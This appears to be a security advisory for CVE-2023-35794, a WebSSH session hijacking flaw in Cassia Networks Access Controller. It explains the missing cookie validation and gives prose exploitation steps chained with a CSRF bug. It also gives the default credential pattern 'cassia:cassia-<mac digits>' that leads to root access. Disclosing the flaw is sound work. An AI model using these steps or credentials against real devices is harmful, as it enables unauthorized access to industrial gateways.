Session establishment is done via GET request to proper /ap/remote/<mac>?ssh_port=<ac-rev-ssh-port> Gateway then receiving request through MQTT (or CAPWAP) channel and establishes SSH tunnel with local port forwarding to Access Controller. Then Access-Controller binds to the forwarded port with SSH Web Session. The user who invoked the web ssh session is redirected to /ssh/host but the session cookie is not validated. The new WebSSH2 cookie is provided with 401 error.  In fact a user is being asked for providing Basic auth.  Obtained Basic authentication credentials are sent in next requests and potentially consumed by webssh2.bundle.js as credentials used to authenticate to the choosen device.   This allows unathorized to Access Controller portal User to hijack already existing SSH session with only knowing SSH username and password (note that this commonly may be default cassia:cassia-<last-mac-6-digits>).

**Exploitation**

An attacker may use CVE-2023-35793 to trick any athenticated user to initiate a session to any device connected to the AC (note that the user does not need to login into the gateway, the session itself will be initiated with only exploiting CVE-2023-35793 CSRF). Then using this vulnerability and knowing the MAC address an attacker may easily obtain access to the device through WebSSH.

Lets assume an attacker triggered someone and the session is established to the gateway where the default credentials are used.

1.  Attacker just opens the web browser and enters default credentials for known device. 
2.  Attacker knowing which device were triggered provides default credentials (commonly these are not being changed) 
3.  Attacker is authenticated to device LXC container as a user which has root rights by default 

**Remediation**

*   Patch to the highest possible version availaible on Cassia Networks

CVE-2023-35794: GitHub - Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking: Repository contains description for CVE-2023-35794 discovered by Dodge Industrial Team for Dodge OPTIFY platfrom.

Tag

#ssh